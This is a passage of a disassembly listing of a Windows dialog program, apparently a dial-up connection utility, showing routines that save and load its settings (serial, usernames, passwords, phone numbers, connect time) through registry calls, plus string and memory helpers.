push eax
mov ecx, esi
call sub_4065D0
jmp loc_4088AE
; ---------------------------------------------------------------------------
loc_40878A: ; CODE XREF: sub_408350+79�j
; DATA XREF: .text:off_4088E0�o
cmp [esi+58h], bl ; jumptable 004083C9 case 0
jnz short loc_40880E
cmp [esi+5Ah], bl
jnz short loc_40880E
lea edi, [esi+24h]
push 2
mov ecx, edi
call sub_408E80
mov ecx, dword_41252C
push eax
call sub_409780
push 2
mov ecx, edi
call sub_408EC0
mov ecx, dword_41252C
push eax
call sub_4097A0
push 2
mov ecx, edi
call sub_408F00
mov ecx, dword_41252C
push eax
call sub_409730
mov eax, [esi+4]
push ebx
push ebx
push 184h
push 0CCh
push eax
mov dword ptr [esi+60h], 3
call ds:dword_40F1C4 ; SendDlgItemMessageA
mov ecx, [esi+4]
push ebx
push 0FAh
push 1
push ecx
call ds:dword_40F1C0 ; SetTimer
mov byte ptr [esi+5Ah], 1
jmp loc_4088AB
; ---------------------------------------------------------------------------
loc_40880E: ; CODE XREF: sub_408350+43D�j
; sub_408350+442�j
mov edx, [esi+4]
push 1
push edx
call ds:dword_40F1BC ; KillTimer
push 385h
push 1
mov ecx, esi
call sub_406060
mov ecx, dword_41252C
lea edi, [esi+24h]
call sub_4098E0
mov ecx, edi
mov ebp, eax
call sub_408FC0
add ebp, eax
push ebp
mov ecx, edi
call sub_408FB0
mov ecx, edi
call sub_408E40
push 1
mov ecx, edi
call sub_408E80
mov ecx, dword_41252C
push eax
call sub_409780
push 1
mov ecx, edi
call sub_408EC0
mov ecx, dword_41252C
push eax
call sub_4097A0
push 1
mov ecx, edi
call sub_408F00
mov ecx, dword_41252C
push eax
call sub_409730
cmp ds:byte_40F7F9, bl
jz short loc_40889F
mov eax, [esi+4]
push 5
push eax
jmp short loc_4088A5
; ---------------------------------------------------------------------------
loc_40889F: ; CODE XREF: sub_408350+545�j
mov ecx, [esi+4]
push 9
push ecx
loc_4088A5: ; CODE XREF: sub_408350+54D�j
call ds:dword_40F228 ; ShowWindow
loc_4088AB: ; CODE XREF: sub_408350+4B9�j
mov [esi+59h], bl
loc_4088AE: ; CODE XREF: sub_408350+CF�j
; sub_408350+F4�j ...
pop edi
pop ebp
loc_4088B0: ; CODE XREF: sub_408350+66�j
; sub_408350+71�j
mov eax, [esp+90h+Memory] ; default
cmp eax, ebx
jz short loc_4088C5
push eax ; Memory
call _free
mov [esp+94h+Memory], ebx
add esp, 4
loc_4088C5: ; CODE XREF: sub_408350+566�j
mov edx, [esp+90h+var_84]
push edx
call ds:dword_40F194
pop esi
xor eax, eax
pop ebx
add esp, 88h
retn 10h
sub_408350 endp
; ---------------------------------------------------------------------------
align 10h
off_4088E0 dd offset loc_40878A ; DATA XREF: sub_408350+79�r
dd offset loc_4083D0 ; jump table for switch statement
dd offset loc_408424
dd offset loc_40847B
dd offset loc_4084B8
dd offset loc_408503
dd offset loc_4085BE
dd offset loc_4086A0
dd offset loc_4086FC
dd offset loc_40874B
align 10h
; =============== S U B R O U T I N E =======================================
sub_408910 proc near ; CODE XREF: sub_404B20+C�p
; sub_406390+109�p
push ebx
push ebp
push esi
push edi
mov edi, ecx
mov eax, [edi]
push eax ; Memory
call _free
mov ecx, [edi+4]
xor ebx, ebx
push ecx ; Memory
mov [edi], ebx
call _free
add esp, 8
mov [edi+4], ebx
lea esi, [edi+10h]
mov ebp, 2
lea esp, [esp+0]
loc_408940: ; CODE XREF: sub_408910+6B�j
mov eax, [esi-8]
cmp eax, ebx
jz short loc_408953
push eax ; Memory
call _free
add esp, 4
mov [esi-8], ebx
loc_408953: ; CODE XREF: sub_408910+35�j
mov eax, [esi]
cmp eax, ebx
jz short loc_408964
push eax ; Memory
call _free
add esp, 4
mov [esi], ebx
loc_408964: ; CODE XREF: sub_408910+47�j
mov eax, [esi+8]
cmp eax, ebx
jz short loc_408977
push eax ; Memory
call _free
add esp, 4
mov [esi+8], ebx
loc_408977: ; CODE XREF: sub_408910+59�j
add esi, 4
dec ebp
jnz short loc_408940
mov eax, [edi+20h]
cmp eax, ebx
jz short loc_408990
push eax ; Memory
call _free
add esp, 4
mov [edi+20h], ebx
loc_408990: ; CODE XREF: sub_408910+72�j
mov eax, [edi+28h]
cmp eax, ebx
jz short loc_4089A3
push eax ; Memory
call _free
add esp, 4
mov [edi+28h], ebx
loc_4089A3: ; CODE XREF: sub_408910+85�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_408910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4089B0 proc near ; CODE XREF: sub_408A10+4E�p
; sub_408B20+10�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi]
test eax, eax
jz short loc_4089C5
push eax ; Memory
call _free
add esp, 4
loc_4089C5: ; CODE XREF: sub_4089B0+A�j
mov esi, [esp+8+arg_4]
test esi, esi
jnz short loc_4089D6
mov [edi], esi
pop edi
mov al, 1
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_4089D6: ; CODE XREF: sub_4089B0+1B�j
push esi
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
call _malloc
add esp, 4
test eax, eax
mov [edi], eax
jnz short loc_4089F4
pop edi
xor al, al
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_4089F4: ; CODE XREF: sub_4089B0+3B�j
push esi
push eax
call ds:dword_40F0A0 ; lstrcpy
pop edi
mov al, 1
pop esi
retn 8
sub_4089B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408A10 proc near ; CODE XREF: sub_408E60+13�p
; sub_408EA0+13�p
var_400 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov edx, [esp+arg_8]
sub esp, 400h
push esi
push 400h
lea eax, [esp+408h+var_400]
mov esi, ecx
mov ecx, [esp+408h+arg_C]
push eax
push ecx
push edx
call ds:dword_40F1E4 ; LoadStringA
test eax, eax
jz short loc_408A6D
mov eax, [esp+404h+arg_0]
cmp eax, 1
jl short loc_408A6D
cmp eax, 2
jg short loc_408A6D
mov edx, [esp+404h+arg_4]
lea ecx, [esp+404h+var_400]
push ecx
lea eax, [edx+eax*4-4]
push eax
mov ecx, esi
call sub_4089B0
pop esi
add esp, 400h
retn 10h
; ---------------------------------------------------------------------------
loc_408A6D: ; CODE XREF: sub_408A10+28�j
; sub_408A10+34�j ...
xor al, al
pop esi
add esp, 400h
retn 10h
sub_408A10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408A80 proc near ; CODE XREF: sub_408B20+62�p
; sub_408B20+7F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
mov edx, [ebx]
push ebp
mov ebp, ds:dword_40F01C
push edi
mov edi, [esp+0Ch+arg_4]
lea eax, [esp+0Ch+arg_4]
push eax
push 0
lea ecx, [esp+14h+arg_0]
push ecx
push 0
push edi
push edx
call ebp ; RegQueryValueExA
test eax, eax
jnz short loc_408AB0
cmp [esp+0Ch+arg_0], 1
jz short loc_408AB8
loc_408AB0: ; CODE XREF: sub_408A80+27�j
pop edi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_408AB8: ; CODE XREF: sub_408A80+2E�j
push esi
mov esi, [esp+10h+arg_8]
mov eax, [esi]
test eax, eax
jz short loc_408ACC
push eax ; Memory
call _free
add esp, 4
loc_408ACC: ; CODE XREF: sub_408A80+41�j
mov eax, [esp+10h+arg_4]
inc eax
push eax ; Size
call _malloc
add esp, 4
test eax, eax
mov [esi], eax
jz short loc_408B08
lea ecx, [esp+10h+arg_4]
push ecx
push eax
mov eax, [ebx]
lea edx, [esp+18h+arg_0]
push edx
push 0
push edi
push eax
call ebp ; RegQueryValueExA
test eax, eax
jz short loc_408B11
mov ecx, [esi]
push ecx ; Memory
call _free
add esp, 4
mov dword ptr [esi], 0
loc_408B08: ; CODE XREF: sub_408A80+5E�j
pop esi
pop edi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_408B11: ; CODE XREF: sub_408A80+75�j
pop esi
pop edi
pop ebp
mov al, 1
pop ebx
retn 0Ch
sub_408A80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408B20 proc near ; CODE XREF: sub_406390+5D�p
; sub_407AF0+59�p
Str = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 4
sub esp, 8
push esi
push edi
mov edi, [esp+10h+arg_0]
mov esi, ecx
push edi
lea eax, [esi+28h]
push eax
call sub_4089B0
lea ecx, [esp+10h+var_4]
push ecx
lea edx, [esp+14h+arg_0]
push edx
push 0
push 0F003Fh
push 0
push 0
push 0
push edi
push 80000001h
mov [esp+34h+arg_0], 0
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jz short loc_408B6E
pop edi
xor al, al
pop esi
add esp, 8
retn 4
; ---------------------------------------------------------------------------
loc_408B6E: ; CODE XREF: sub_408B20+42�j
push ebx
push esi
push offset aVersion ; "version"
lea eax, [esp+1Ch+arg_0]
xor edi, edi
push eax
mov ecx, esi
mov [esp+20h+Str], edi
call sub_408A80
test al, al
jz loc_408C6C
lea ecx, [esi+4]
push ecx
push offset aSerial ; "serial"
lea edx, [esp+1Ch+arg_0]
push edx
mov ecx, esi
call sub_408A80
test al, al
jz loc_408C6C
lea eax, [esi+8]
push eax
push offset aUsername1 ; "username1"
lea ecx, [esp+1Ch+arg_0]
push ecx
mov ecx, esi
call sub_408A80
test al, al
jz loc_408C6C
lea edx, [esi+0Ch]
push edx
push offset aUsername2 ; "username2"
lea eax, [esp+1Ch+arg_0]
push eax
mov ecx, esi
call sub_408A80
test al, al
jz loc_408C6C
lea ecx, [esi+10h]
push ecx
push offset aPassword1 ; "password1"
lea edx, [esp+1Ch+arg_0]
push edx
mov ecx, esi
call sub_408A80
test al, al
jz short loc_408C6C
lea eax, [esi+14h]
push eax
push offset aPassword2 ; "password2"
lea ecx, [esp+1Ch+arg_0]
push ecx
mov ecx, esi
call sub_408A80
test al, al
jz short loc_408C6C
lea edx, [esi+18h]
push edx
push offset aPhonenumber1 ; "phonenumber1"
lea eax, [esp+1Ch+arg_0]
push eax
mov ecx, esi
call sub_408A80
test al, al
jz short loc_408C6C
lea ecx, [esi+1Ch]
push ecx
push offset aPhonenumber2 ; "phonenumber2"
lea edx, [esp+1Ch+arg_0]
push edx
mov ecx, esi
call sub_408A80
test al, al
jz short loc_408C6C
lea eax, [esp+14h+Str]
push eax
push offset aConnecttime ; "connecttime"
lea ecx, [esp+1Ch+arg_0]
push ecx
mov ecx, esi
call sub_408A80
test al, al
mov edi, [esp+14h+Str]
jz short loc_408C6C
mov bl, 1
jmp short loc_408C6E
; ---------------------------------------------------------------------------
loc_408C6C: ; CODE XREF: sub_408B20+69�j
; sub_408B20+86�j ...
xor bl, bl
loc_408C6E: ; CODE XREF: sub_408B20+14A�j
mov edx, [esp+14h+arg_0]
push edx
call ds:dword_40F020 ; RegCloseKey
cmp bl, 1
jnz short loc_408C9C
push 0Ah ; Radix
lea eax, [esp+18h+Str]
push eax ; EndPtr
push edi ; Str
call _strtol
mov ecx, [esp+20h+Str]
mov [esi+24h], eax
mov al, [ecx]
add esp, 0Ch
test al, al
setz bl
loc_408C9C: ; CODE XREF: sub_408B20+15C�j
test edi, edi
jz short loc_408CA9
push edi ; Memory
call _free
add esp, 4
loc_408CA9: ; CODE XREF: sub_408B20+17E�j
mov al, bl
pop ebx
pop edi
pop esi
add esp, 8
retn 4
sub_408B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408CC0 proc near ; CODE XREF: sub_408CF0+CF�p
; sub_408CF0+E8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push esi
call ds:dword_40F084 ; lstrlen
mov ecx, [esp+4+arg_0]
mov edx, [ecx]
push eax
mov eax, [esp+8+arg_4]
push esi
push 1
push 0
push eax
push edx
call ds:dword_40F010 ; RegSetValueExA
neg eax
sbb al, al
inc al
pop esi
retn 0Ch
sub_408CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408CF0 proc near ; CODE XREF: sub_408E40+B�p
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
arg_0 = dword ptr 4
sub esp, 44h
mov edx, [esp+44h+arg_0]
push esi
lea eax, [esp+48h+arg_0]
push eax
mov esi, ecx
lea ecx, [esp+4Ch+var_44]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000001h
mov [esp+6Ch+var_44], 0
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jz short loc_408D32
xor al, al
pop esi
add esp, 44h
retn 4
; ---------------------------------------------------------------------------
loc_408D32: ; CODE XREF: sub_408CF0+37�j
mov ecx, [esi+24h]
push ebx
push ebp
push edi
push 0Ah ; int
lea eax, [esp+58h+var_40]
push eax ; char *
push ecx ; __int32
call __ltoa
mov edi, [esi]
mov ebx, ds:dword_40F084
add esp, 0Ch
push edi
call ebx ; lstrlen
mov edx, dword ptr [esp+50h+var_40]
mov ebp, ds:dword_40F010
push eax
push edi
push 1
push 0
push offset aVersion ; "version"
push edx
call ebp ; RegSetValueExA
test eax, eax
jnz loc_408E18
mov edi, [esi+4]
push edi
call ebx ; lstrlen
push eax
mov eax, dword ptr [esp+54h+var_40]
push edi
push 1
push 0
push offset aSerial ; "serial"
push eax
call ebp ; RegSetValueExA
test eax, eax
jnz loc_408E18
mov edi, [esi+8]
push edi
call ebx ; lstrlen
mov ecx, dword ptr [esp+50h+var_40]
push eax
push edi
push 1
push 0
push offset aUsername1 ; "username1"
push ecx
call ebp ; RegSetValueExA
test eax, eax
jnz short loc_408E18
mov edx, [esi+0Ch]
push edx
push offset aUsername2 ; "username2"
lea eax, [esp+58h+var_40]
push eax
mov ecx, esi
call sub_408CC0
test al, al
jz short loc_408E18
mov ecx, [esi+10h]
push ecx
push offset aPassword1 ; "password1"
lea edx, [esp+58h+var_40]
push edx
mov ecx, esi
call sub_408CC0
test al, al
jz short loc_408E18
mov eax, [esi+14h]
push eax
push offset aPassword2 ; "password2"
lea ecx, [esp+58h+var_40]
push ecx
mov ecx, esi
call sub_408CC0
test al, al
jz short loc_408E18
lea edx, [esp+50h+var_3C]
push edx
push offset aConnecttime ; "connecttime"
lea eax, [esp+58h+var_40]
push eax
mov ecx, esi
call sub_408CC0
test al, al
jz short loc_408E18
mov bl, 1
jmp short loc_408E1A
; ---------------------------------------------------------------------------
loc_408E18: ; CODE XREF: sub_408CF0+7D�j
; sub_408CF0+9D�j ...
xor bl, bl
loc_408E1A: ; CODE XREF: sub_408CF0+126�j
mov ecx, dword ptr [esp+50h+var_40]
push ecx
call ds:dword_40F020 ; RegCloseKey
pop edi
pop ebp
mov al, bl
pop ebx
pop esi
add esp, 44h
retn 4
sub_408CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408E40 proc near ; CODE XREF: sub_407D40+500�p
; sub_408350+4FB�p
mov eax, [ecx+28h]
test eax, eax
jnz short loc_408E4A
xor al, al
retn
; ---------------------------------------------------------------------------
loc_408E4A: ; CODE XREF: sub_408E40+5�j
push eax
call sub_408CF0
retn
sub_408E40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408E60 proc near ; CODE XREF: sub_405BF0+1F�p
; sub_405BF0+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
mov edx, [esp+arg_4]
push eax
push edx
mov edx, [esp+8+arg_0]
lea eax, [ecx+8]
push eax
push edx
call sub_408A10
retn 0Ch
sub_408E60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408E80 proc near ; CODE XREF: sub_406390+11F�p
; sub_408350+44B�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jl short loc_408E95
cmp eax, 2
jg short loc_408E95
mov eax, [ecx+eax*4+4]
retn 4
; ---------------------------------------------------------------------------
loc_408E95: ; CODE XREF: sub_408E80+7�j
; sub_408E80+C�j
xor eax, eax
retn 4
sub_408E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408EA0 proc near ; CODE XREF: sub_405BF0+3D�p
; sub_405BF0+4C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
mov edx, [esp+arg_4]
push eax
push edx
mov edx, [esp+8+arg_0]
lea eax, [ecx+10h]
push eax
push edx
call sub_408A10
retn 0Ch
sub_408EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408EC0 proc near ; CODE XREF: sub_406390+134�p
; sub_408350+460�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jl short loc_408ED5
cmp eax, 2
jg short loc_408ED5
mov eax, [ecx+eax*4+0Ch]
retn 4
; ---------------------------------------------------------------------------
loc_408ED5: ; CODE XREF: sub_408EC0+7�j
; sub_408EC0+C�j
xor eax, eax
retn 4
sub_408EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408EE0 proc near ; CODE XREF: sub_4066F0+83E�p
; sub_4066F0+84F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jl short loc_408EFB
cmp eax, 2
jg short loc_408EFB
lea eax, [ecx+eax*4+14h]
mov [esp+arg_0], eax
jmp sub_4089B0
; ---------------------------------------------------------------------------
loc_408EFB: ; CODE XREF: sub_408EE0+7�j
; sub_408EE0+C�j
xor al, al
retn 8
sub_408EE0 endp
; =============== S U B R O U T I N E =======================================
sub_408F00 proc near ; CODE XREF: sub_406390+159�p
; sub_408350+475�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jl short loc_408F15
cmp eax, 2
jg short loc_408F15
mov eax, [ecx+eax*4+14h]
retn 4
; ---------------------------------------------------------------------------
loc_408F15: ; CODE XREF: sub_408F00+7�j
; sub_408F00+C�j
xor eax, eax
retn 4
sub_408F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408F20 proc near ; CODE XREF: sub_406390+116�p
var_400 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
sub esp, 400h
push esi
push 400h
lea eax, [esp+408h+var_400]
mov esi, ecx
mov ecx, [esp+408h+arg_4]
push eax
push ecx
push edx
call ds:dword_40F1E4 ; LoadStringA
test eax, eax
jz short loc_408F76
mov eax, [esi+20h]
test eax, eax
jz short loc_408F5A
push eax ; Memory
call _free
add esp, 4
loc_408F5A: ; CODE XREF: sub_408F20+2F�j
lea eax, [esp+404h+var_400]
push eax
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
call _malloc
add esp, 4
test eax, eax
mov [esi+20h], eax
jnz short loc_408F82
loc_408F76: ; CODE XREF: sub_408F20+28�j
xor al, al
pop esi
add esp, 400h
retn 8
; ---------------------------------------------------------------------------
loc_408F82: ; CODE XREF: sub_408F20+54�j
lea ecx, [esp+404h+var_400]
push ecx
push eax
call ds:dword_40F0A0 ; lstrcpy
mov al, 1
pop esi
add esp, 400h
retn 8
sub_408F20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408FA0 proc near ; CODE XREF: sub_408350+31F�p
mov eax, [ecx+20h]
retn
sub_408FA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408FB0 proc near ; CODE XREF: sub_405BF0+55�p
; sub_408350+4F4�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov [ecx+24h], eax
retn 4
sub_408FB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408FC0 proc near ; CODE XREF: sub_406390+D6�p
; sub_408350+4EA�p
mov eax, [ecx+24h]
retn
sub_408FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408FD0 proc near ; CODE XREF: sub_405BF0+10�p
var_400 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
sub esp, 400h
push esi
push 400h
lea eax, [esp+408h+var_400]
mov esi, ecx
mov ecx, [esp+408h+arg_4]
push eax
push ecx
push edx
call ds:dword_40F1E4 ; LoadStringA
test eax, eax
jz short loc_409026
mov eax, [esi+4]
test eax, eax
jz short loc_40900A
push eax ; Memory
call _free
add esp, 4
loc_40900A: ; CODE XREF: sub_408FD0+2F�j
lea eax, [esp+404h+var_400]
push eax
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
call _malloc
add esp, 4
test eax, eax
mov [esi+4], eax
jnz short loc_409032
loc_409026: ; CODE XREF: sub_408FD0+28�j
xor al, al
pop esi
add esp, 400h
retn 8
; ---------------------------------------------------------------------------
loc_409032: ; CODE XREF: sub_408FD0+54�j
lea ecx, [esp+404h+var_400]
push ecx
push eax
call ds:dword_40F0A0 ; lstrcpy
mov al, 1
pop esi
add esp, 400h
retn 8
sub_408FD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409050 proc near ; CODE XREF: sub_404850+1B�p
; sub_406390+7D�p
push esi
push edi
mov esi, ecx
xor edi, edi
push offset a2_0 ; "2.0"
mov [esi], edi
mov [esi+4], edi
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
call _malloc
add esp, 4
cmp eax, edi
mov [esi], eax
jz short loc_409082
push offset a2_0 ; "2.0"
push eax
call ds:dword_40F0A0 ; lstrcpy
loc_409082: ; CODE XREF: sub_409050+24�j
mov [esi+28h], edi
mov [esi+24h], edi
lea eax, [esi+10h]
mov ecx, 2
loc_409090: ; CODE XREF: sub_409050+4C�j
mov [eax-8], edi
mov [eax], edi
mov [eax+8], edi
add eax, 4
dec ecx
jnz short loc_409090
mov [esi+20h], edi
pop edi
mov eax, esi
pop esi
retn
sub_409050 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4090B0 proc near ; CODE XREF: sub_406390+93�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
mov edi, ecx
mov eax, [edi]
test eax, eax
mov ecx, [ebx]
jz loc_409180
test ecx, ecx
jz loc_409180
mov esi, ds:dword_40F0B8
push ecx
push eax
call esi ; lstrcmp
neg eax
sbb al, al
inc al
jz loc_409180
mov eax, [edi+4]
test eax, eax
mov ecx, [ebx+4]
jz loc_409180
test ecx, ecx
jz loc_409180
push ecx
push eax
call esi ; lstrcmp
neg eax
sbb al, al
inc al
jz short loc_409180
push ebp
lea ebp, [ebx+10h]
mov [esp+14h+var_4], 0
lea esi, [edi+8]
sub ebx, edi
loc_409117: ; CODE XREF: sub_4090B0+BA�j
mov eax, [esi]
test eax, eax
mov ecx, [ebx+esi]
jz short loc_409176
test ecx, ecx
jz short loc_409176
mov edi, ds:dword_40F0B8
push ecx
push eax
call edi ; lstrcmp
neg eax
sbb al, al
inc al
mov byte ptr [esp+14h+arg_0], al
jz short loc_409176
mov eax, [esi+8]
test eax, eax
mov ecx, [ebp+0]
jz short loc_409176
test ecx, ecx
jz short loc_409176
push ecx
push eax
call edi ; lstrcmp
neg eax
sbb al, al
inc al
mov byte ptr [esp+14h+arg_0], al
jz short loc_409176
mov eax, [esp+14h+var_4]
inc eax
add esi, 4
add ebp, 4
cmp eax, 2
mov [esp+14h+var_4], eax
jl short loc_409117
pop ebp
pop edi
pop esi
mov al, 1
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_409176: ; CODE XREF: sub_4090B0+6E�j
; sub_4090B0+72�j ...
pop ebp
pop edi
pop esi
xor al, al
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_409180: ; CODE XREF: sub_4090B0+10�j
; sub_4090B0+18�j ...
pop edi
pop esi
xor al, al
pop ebx
pop ecx
retn 4
sub_4090B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409190 proc near ; CODE XREF: sub_406390+100�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 8
push ebx
push ebp
mov ebp, [esp+10h+arg_0]
mov eax, [ebp+0]
push esi
push edi
mov ebx, ecx
push eax
push ebx
call sub_4089B0
mov ecx, [ebp+4]
push ecx
lea edx, [ebx+4]
push edx
mov ecx, ebx
call sub_4089B0
lea eax, [ebp+10h]
mov [esp+18h+arg_0], eax
mov eax, ebp
sub eax, ebx
lea esi, [ebx+8]
mov [esp+18h+var_4], eax
mov [esp+18h+var_8], 2
jmp short loc_4091D6
; ---------------------------------------------------------------------------
loc_4091D2: ; CODE XREF: sub_409190+D5�j
mov eax, [esp+18h+var_4]
loc_4091D6: ; CODE XREF: sub_409190+40�j
mov edi, [eax+esi]
mov eax, [esi]
test eax, eax
jz short loc_4091E8
push eax ; Memory
call _free
add esp, 4
loc_4091E8: ; CODE XREF: sub_409190+4D�j
test edi, edi
jnz short loc_4091F0
mov [esi], edi
jmp short loc_40920F
; ---------------------------------------------------------------------------
loc_4091F0: ; CODE XREF: sub_409190+5A�j
push edi
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
call _malloc
add esp, 4
test eax, eax
mov [esi], eax
jz short loc_40920F
push edi
push eax
call ds:dword_40F0A0 ; lstrcpy
loc_40920F: ; CODE XREF: sub_409190+5E�j
; sub_409190+75�j
mov eax, [esi+8]
test eax, eax
mov ecx, [esp+18h+arg_0]
mov edi, [ecx]
jz short loc_409225
push eax ; Memory
call _free
add esp, 4
loc_409225: ; CODE XREF: sub_409190+8A�j
test edi, edi
jnz short loc_40922E
mov [esi+8], edi
jmp short loc_40924E
; ---------------------------------------------------------------------------
loc_40922E: ; CODE XREF: sub_409190+97�j
push edi
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
call _malloc
add esp, 4
test eax, eax
mov [esi+8], eax
jz short loc_40924E
push edi
push eax
call ds:dword_40F0A0 ; lstrcpy
loc_40924E: ; CODE XREF: sub_409190+9C�j
; sub_409190+B4�j
mov ecx, [esp+18h+arg_0]
mov eax, [esp+18h+var_8]
add ecx, 4
add esi, 4
dec eax
mov [esp+18h+arg_0], ecx
mov [esp+18h+var_8], eax
jnz loc_4091D2
mov eax, [ebx+20h]
test eax, eax
mov esi, [ebp+20h]
jz short loc_40927E
push eax ; Memory
call _free
add esp, 4
loc_40927E: ; CODE XREF: sub_409190+E3�j
test esi, esi
jnz short loc_409295
mov [ebx+20h], esi
mov edx, [ebp+24h]
pop edi
pop esi
pop ebp
mov [ebx+24h], edx
pop ebx
add esp, 8
retn 4
; ---------------------------------------------------------------------------
loc_409295: ; CODE XREF: sub_409190+F0�j
push esi
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
call _malloc
add esp, 4
test eax, eax
mov [ebx+20h], eax
jz short loc_4092C5
push esi
push eax
call ds:dword_40F0A0 ; lstrcpy
mov eax, [ebp+24h]
pop edi
pop esi
pop ebp
mov [ebx+24h], eax
pop ebx
add esp, 8
retn 4
; ---------------------------------------------------------------------------
loc_4092C5: ; CODE XREF: sub_409190+11B�j
mov ecx, [ebp+24h]
pop edi
pop esi
pop ebp
mov [ebx+24h], ecx
pop ebx
add esp, 8
retn 4
sub_409190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4092E0 proc near ; CODE XREF: sub_409BC0+187�p
push esi
mov esi, ecx
call _clock
mov [esi+5D0h], eax
mov dword ptr [esi+5CCh], 2
pop esi
retn
sub_4092E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409300 proc near ; CODE XREF: sub_409BC0+5B�p
; sub_409BC0+14C�p
push esi
mov esi, ecx
cmp dword ptr [esi+5CCh], 2
jnz short loc_409323
call _clock
mov [esi+5D4h], eax
mov dword ptr [esi+5CCh], 0
pop esi
retn
; ---------------------------------------------------------------------------
loc_409323: ; CODE XREF: sub_409300+A�j
mov eax, [esi+5D0h]
mov [esi+5D4h], eax
mov dword ptr [esi+5CCh], 0
pop esi
retn
sub_409300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409340 proc near ; CODE XREF: sub_409990+3�p
xor eax, eax
lea edx, [ecx+94h]
push edi
mov [ecx+5FCh], eax
mov [ecx+600h], eax
mov [ecx+5D8h], eax
mov [ecx], eax
mov [ecx+90h], eax
mov [ecx+8Ch], eax
mov [ecx+4B8h], eax
mov [ecx+4], al
mov [ecx+9], al
mov [ecx+5CCh], eax
mov [ecx+5D4h], eax
mov [ecx+5D0h], eax
mov [ecx+5C4h], eax
mov [ecx+5C0h], eax
mov [ecx+4BDh], al
mov [ecx+4BCh], al
mov ecx, 109h
mov edi, edx
rep stosd
mov dword ptr [edx], 424h
pop edi
retn
sub_409340 endp
; =============== S U B R O U T I N E =======================================
sub_4093B0 proc near ; CODE XREF: sub_4099A0+111�p
Size = dword ptr -8
var_4 = dword ptr -4
sub esp, 8
push esi
mov esi, ecx
mov eax, [esi+5D8h]
push edi
